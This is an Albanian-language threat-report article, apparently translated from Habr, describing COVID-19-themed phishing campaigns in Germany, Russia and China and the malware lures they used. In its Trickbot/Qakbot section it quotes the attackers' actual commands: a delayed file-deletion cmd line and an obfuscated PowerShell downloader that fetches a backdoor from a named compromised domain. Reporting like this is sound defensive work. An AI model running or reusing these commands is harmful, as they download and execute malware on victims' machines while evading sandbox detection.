Sulmuesit vazhdojnë të shfrytëzojnë temën e COVID-19, duke krijuar gjithnjë e më shumë kërcënime për përdoruesit që janë shumë të interesuar për gjithçka që lidhet me epideminë. NË Ne kemi folur tashmë se cilat lloje të malware u shfaqën pas koronavirusit, dhe sot do të flasim për teknikat e inxhinierisë sociale që përdoruesit në vende të ndryshme, përfshirë Rusinë, kanë hasur tashmë. Tendencat dhe shembujt e përgjithshëm janë nën prerje.
Mbani mend në Ne folëm për faktin se njerëzit janë të gatshëm të lexojnë jo vetëm për koronavirusin dhe rrjedhën e epidemisë, por edhe për masat e mbështetjes financiare? Ja një shembull i mirë. Një sulm interesant phishing u zbulua në shtetin gjerman të Rhine-Westphalia ose NRW. Sulmuesit krijuan kopje të faqes së internetit të Ministrisë së Ekonomisë (), ku çdokush mund të aplikojë për ndihmë financiare. Një program i tillë ekziston në të vërtetë dhe doli të jetë i dobishëm për mashtruesit. Pasi kanë marrë të dhënat personale të viktimave të tyre, ata kanë bërë një aplikim në faqen e vërtetë të ministrisë, por kanë treguar detaje të tjera bankare. Sipas të dhënave zyrtare deri në zbulimin e skemës janë bërë 4 mijë kërkesa të tilla false. Si rezultat, 109 milionë dollarë të destinuara për qytetarët e prekur ranë në duart e mashtruesve.
Dëshironi një test falas për COVID-19?
Një shembull tjetër domethënës i phishing me temën e koronavirusit ishte në email. Mesazhet tërhoqën vëmendjen e përdoruesve me një ofertë për t'iu nënshtruar testimit falas për infeksionin me koronavirus. Në bashkëngjitje të këtyre ka pasur raste të Trickbot/Qakbot/Qbot. Dhe kur ata që dëshironin të kontrollonin shëndetin e tyre filluan të "plotësonin formularin e bashkangjitur", një skenar me qëllim të keq u shkarkua në kompjuter. Dhe për të shmangur testimin e sandboxing, skripti filloi të shkarkojë virusin kryesor vetëm pas ca kohësh, kur sistemet e mbrojtjes ishin të bindur se nuk do të ndodhte asnjë aktivitet me qëllim të keq.
Bindja e shumicës së përdoruesve për të aktivizuar makro ishte gjithashtu e lehtë. Për ta bërë këtë, u përdor një mashtrim standard: për të plotësuar pyetësorin, së pari duhet të aktivizoni makro, që do të thotë se duhet të ekzekutoni një skript VBA.
Siç mund ta shihni, skripti VBA është i maskuar posaçërisht nga antiviruset.
Windows ka një veçori pritjeje ku aplikacioni pret /T <sekonda> përpara se të pranojë përgjigjen e paracaktuar "Po". Në rastin tonë, skripti priti 65 sekonda përpara se të fshinte skedarët e përkohshëm:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Dhe gjatë pritjes, malware u shkarkua. Një skript i veçantë PowerShell u lançua për këtë:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Pas dekodimit të vlerës Base64, skripti PowerShell shkarkon prapavijën e vendosur në serverin e internetit të hakuar më parë nga Gjermania:
http://automatischer-staubsauger.com/feature/777777.pngdhe e ruan nën emrin:
C:UsersPublictmpdirfile1.exe
Dosje ‘C:UsersPublictmpdir’ fshihet kur ekzekutohet skedari 'tmps1.bat' që përmban komandën cmd /c mkdir ""C:UsersPublictmpdir"".
Sulm në shënjestër ndaj agjencive qeveritare
Për më tepër, analistët e FireEye raportuan së fundmi një sulm të synuar APT32 që synonte strukturat qeveritare në Wuhan, si dhe Ministrinë Kineze të Menaxhimit të Emergjencave. Një nga RTF-të e shpërndara përmbante një lidhje me një artikull të New York Times me titull . Megjithatë, pas leximit të tij, malware u shkarkua (analistët e FireEye e identifikuan shembullin si METALJACK).
Është interesante se në kohën e zbulimit, asnjë nga antivirusët nuk e zbuloi këtë shembull, sipas Virustotal.
Kur faqet zyrtare të internetit nuk funksionojnë
Shembulli më i mrekullueshëm i një sulmi phishing ndodhi në Rusi vetëm një ditë tjetër. Arsyeja për këtë ishte caktimi i një përfitimi të shumëpritur për fëmijët e moshës 3 deri në 16 vjeç. Kur fillimi i pranimit të aplikacioneve u njoftua më 12 maj 2020, miliona njerëz nxituan në faqen e internetit të Shërbimeve Shtetërore për ndihmën e shumëpritur dhe rrëzuan portalin jo më keq se një sulm profesional DDoS. Kur presidenti tha se "Shërbimet qeveritare nuk mund të përballonin fluksin e aplikacioneve", njerëzit filluan të flisnin në internet për hapjen e një faqeje alternative për pranimin e aplikacioneve.
Problemi është se disa sajte filluan të punojnë në të njëjtën kohë, dhe ndërsa një, e vërteta në posobie16.gosuslugi.ru, pranon në të vërtetë aplikacionet, më shumë .
Kolegët nga SearchInform gjetën rreth 30 domene të reja mashtruese në zonën .ru. Infosecurity dhe Softline Company kanë gjurmuar më shumë se 70 faqe interneti të ngjashme të falsifikuara të shërbimeve qeveritare që nga fillimi i prillit. Krijuesit e tyre manipulojnë simbole të njohura dhe përdorin gjithashtu kombinime të fjalëve gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, e kështu me radhë.
Hipe dhe inxhinieri sociale
Të gjithë këta shembuj vetëm konfirmojnë se sulmuesit po fitojnë para me sukses temën e koronavirusit. Dhe sa më i lartë tensioni social dhe çështjet më të paqarta, aq më shumë shanse kanë mashtruesit për të vjedhur të dhëna të rëndësishme, për t'i detyruar njerëzit të heqin dorë nga paratë e tyre ose thjesht të hakojnë më shumë kompjuterë.
Dhe duke pasur parasysh se pandemia ka detyruar njerëzit potencialisht të papërgatitur të punojnë nga shtëpia në masë, jo vetëm të dhënat personale, por edhe të korporatave janë në rrezik. Për shembull, kohët e fundit përdoruesit e Microsoft 365 (ish Office 365) iu nënshtruan gjithashtu një sulmi phishing. Njerëzit morën mesazhe masive zanore "të humbura" si bashkëngjitje të letrave. Sidoqoftë, skedarët ishin në të vërtetë një faqe HTML që dërgonte viktimat e sulmit . Si rezultat, humbja e aksesit dhe komprometimi i të gjitha të dhënave nga llogaria.
Burimi: www.habr.com